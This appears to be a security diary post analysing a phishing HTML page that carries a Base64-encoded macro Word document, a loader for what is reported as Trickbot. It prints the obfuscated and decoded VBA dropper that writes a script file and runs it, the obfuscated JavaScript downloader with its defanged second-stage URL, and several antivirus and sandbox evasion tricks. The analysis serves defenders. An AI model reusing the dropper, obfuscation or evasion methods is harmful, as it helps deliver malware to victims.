Interesting JavaScript Obfuscation Example
Last Friday, one of our reader (thanks Mickael!) reported to us a phishing campaign based on a simple HTML page. He asked us how to properly extract the malicious code within the page. I did an analysis of the file and it looked interesting for a diary because a nice obfuscation technique was used in a Javascript file but also because the attacker tried to prevent automatic analysis by adding some boring code. In fact, the HTML page contains a malicious Word document encoded in Base64. HTML is wonderful because you can embed data into a page and the browser will automatically decode it. This is often used to deliver small pictures like logos:
<img src="data:image/png;base64,[your_base_64_encode_picture]”>
Of course, the technique is the same to create links. That’s the technique used in this HTML page:
<a id="94dff0cf657696" href="data:application/msword;base64,[base64_data]" download="PurchaseSummary.docm" target="_blank">download</a>
Note that you can specify the name of the downloaded file ('PurchaseSummary.docm') and its MIME type ('application/msword'). This technique prevents the file to be processed by antivirus, proxies, etc. The web page looks like this once loaded in a browser:
To extract Base64-encoded strings from a file, you can use Didier’s tool base64dump. In this case, it won’t work out of the box, because the Base64 string is polluted with HTML encode characters! The attacker just replaced some characters by their HTML value:
'c' -> 'c' 'a' -> 'a' '/ -> '/'
Why only this letter? No idea but it's easy to fix. Let’s convert them on the fly and now we can find interesting Base64 strings:
remnux@remnux:/tmp$ cat System_Authorization_Form_53435_html.2391943 | \ sed 's/c/c/g' | \ sed 's/a/a/g' | \ sed 's///\//g' | \ base64dump.py -n 5000 ID Size Encoded Decoded MD5 decoded -- ---- ------- ------- ----------- 1: 276516 UEsDBBQABgAIAAAA PK..........!.[ b809f8cdd3b47daf44483efaf73b2a6b
The first stream looks interesting because we see the beginning of a ZIP file, that's our Word document. Let’s decode it:
remnux@remnux:/tmp$ cat System_Authorization_Form_53435_html.2391943.html | \ sed 's/c/c/g'|sed 's/a/a/g'|sed 's///\//g' | \ base64dump.py -n 5000 -s 1 -d >malicious.docm remnux@remnux:/tmp$ file malicious.docm malicious.docm: Microsoft Word 2007+ remnux@remnux:/tmp$ unzip -t malicious.docm Archive: malicious.docm testing: [Content_Types].xml OK testing: _rels/.rels OK testing: word/_rels/document.xml.rels OK testing: word/document.xml OK testing: word/vbaProject.bin OK testing: word/media/image1.jpeg OK testing: word/_rels/vbaProject.bin.rels OK testing: word/theme/theme1.xml OK testing: word/vbaData.xml OK testing: word/settings.xml OK testing: docProps/app.xml OK testing: word/styles.xml OK testing: docProps/core.xml OK testing: word/fontTable.xml OK testing: word/webSettings.xml OK
Let’s have a look at our Word document, it’s a classic document that asks the user to disable standard features to let the macro execute properly:
The macro looks interesting. First, it contains a lot of unneeded code placed into comments:
Sub autoopen() Dim y0stwKSRAK0 R1ovvWHwXav = "End Function Set z8RNVW = New I3MKkfUg " For ccccccccccc1 = 1 To 1000000000 Dim l7VgEVJS1 Dim y7FWWreec1 b1tDyphghzzU = " A5bZii = x5RNcWuD & Trim(B1cog.b4TMDx()) E9qmlG = P3PcneQA & Trim(u6zul.k9hXFlIu()) " sttttttttrrrrrr = raaaaaaaaanstrrrrrr(3) k8BSxwyH = "Private Sub Class u0LnXFT F1BOd = b1CoTMo & Trim(k6DDqKe.w8VCQ()) t9GhgrP = v6IZHz & Trim(N6fDmlo.I8guCAn()) " a0QbyIquPy = "End Sub If Len(D0iSmR.A9AfR) > 0 Then " S1fhDERlhedC = "While Not G7JGyC.x7siMbO " If sttttttttrrrrrr = "mmm" Then Dim F9OzltwVgSyw5 y1CnbwmVPS = "If Len(R4hUqNnA.U8Xko) > 0 Then If Len(T3TColVp.u4siG) > 0 Then Sub s3Qsi " F3BWHPonwyJi = "If Len(z4bUPH.J2ClHnJe) > 0 Then For Each t2BJksf In w0wuX Set L7AABis = Nothing “
Here is the decoded/beautified macro:
Sub autoopen() For i = 1 To 1000000000 s = get_random_string(3) If s = "mmm" Then opentextfile End If Next End Sub Sub opentextfile() payload = UserForm1.TextBox1.Text doc = ActiveDocument.AttachedTemplate.Path doc2 = doc doc2 = doc2 & Chr(92) doc2 = doc2 & get_random_string(7) & ".wsf" Open doc2 For Output As #33 Print #33, payload Close #33 Set WshScript = CreateObject("WScript.Shell") D = WshScript.Run(doc2, 1, False) End Sub Function get_randon_string(n) Dim i, j, m, s, chars Randomize chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" m = Len(chars) For i = 1 To n j = 1 + Int(m * Rnd()) s = s & Mid(chars, j, 1) Next get_random_string = s End Function
You can see that, instead of using a call to sleep() to delay the installation of the payload, the macro enters a loop of 1B occurrences and will perform the next infection steps once the randomly generated string is “mmm”. It tested on my sandbox several times and it works! I had to wait between 10 - 30 seconds.
The payload is extracted from a form present in the document ("UserForm1.TextBox1.Text”), dumped on disk and executed. The payload is a Windows Script File (Javascript). The file is quite big for a downloader: 445KB on a singe line! (SHA256: 975011bcc2ca1b6af470ca99c8a31cf0d9204d2f1d3bd666b0d5524c0bfdbf9e).
Once beautified, the code contains plenty of functions and looks like this:
var fPfEqdoors10 = String[(function() { var kejparl_9 = { 44: "7", 163: "g", 259: "f", 824: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](kejparl_9[824](259)); })('addition12') + (function() { var unwcome_4 = { 58: "h", 128: "r", 217: "c", 585: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](unwcome_4[585](128)); })('idea30') + (function() { var wiqparli_8 = { 32: "d", 182: "o", 244: "b", 926: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](wiqparli_8[926](182)); })('addition12', 'being85', 'evades38') + (function() { var hpslivel_6 = { 99: "k", 198: "p", 293: "m", 535: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](hpslivel_6[535](293)); })('being55', 'simple80', 'allow29', 'tactless28') + (function() { var uuurelat_5 = { 93: "t", 167: "C", 295: "n", 605: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](uuurelat_5[605](167)); })('into78', 'Asimov96', 'must20', 'named30') + (function() { var hujthei_8 = { 13: "h", 183: "e", 316: "k", 603: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](hujthei_8[603](13)); })('what7') + (function() { var ekerooms_9 = { 91: "s", 111: "a", 323: "s", 504: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](ekerooms_9[504](111)); })('first65') + (function() { var iuiagain_6 = { 63: "i", 121: "r", 338: "c", 558: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](iuiagain_6[558](121)); })('declarations33', 'provided43', 'second43') + (function() { var jwvandpu_6 = { 35: "j", 166: "C", 244: "b", 876: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](jwvandpu_6[876](166)); })('while37', 'that88') + (function() { var jhelivel_7 = { 48: "t", 131: "o", 384: "9", 666: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](jhelivel_7[666](131)); })('being55', 'simple80', 'allow29', 'tactless28') + (function() { var jesrela_9 = { 98: "i", 173: "d", 483: "n", 737: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](jesrela_9[737](173)); })('into78', 'Asimov96', 'must20') + (function() { var puiinth_5 = { 21: "e", 194: "g", 355: "a", 860: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](puiinth_5[860](21)); })('rooted48', 'thus6')](92);
Just be scrolling down the code, you can distinguish a pattern. Obfuscated strings are based on functions that return one character at a time and that are concatenated to each others. Example:
function() { var kejparl_9 = { 44: "7", 163: "g", 259: "f", 824: function(val1) { return this[val1]; } }; return this[PbDpbaz('un', true, 'es')](kejparl_9[824](259)); }
The function PbDpbaz() returns the string 'unescape' and function() returns a character from the dictionary 'kejpalr_9'. In this case: 'f' (corresponding to element ‘259’). If you apply this technique to the function above, you will get:
var fPfEqdoors10 = “fromCharCode”;
The complete script is based on this technique and requires a lot of time to be processed by Javascript emulators. I tried to search for occurrences of the following letters ‘h’, ’t’, ’t’, ‘p’ and found the URL used to download the 2nd stage:
var fPfEqbecause57 = "hxxps://185[.]159[.]82[.]237/odrivers/update-9367.php”
As well as parameters:
?oxx=s2 &u=abs&o=&v=&s=floorrandomfloorrandomfloorrandom
The script also implements an anti-sandbox trick. It displays a popup message that could block or delay an automated analysis:
var fPfEqmight1 = "A File Error Has Occurred”; if(fPfEqthrown7) { fPfEqwell7[(function() { ... })('into78', 'Asimov96')](unescape(fPfEqmight1), 30, unescape(fPfEqmost44), fPfEqconducted9); }
'fPfEqwell7' is decoded into 'Popup' to display the message to the user for 30".
I was not able to trigger the download of the second stage (probably I was missing some arguments or a specific HTTP header) but, according to VT, the decoded URL downloads a Trickbot.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments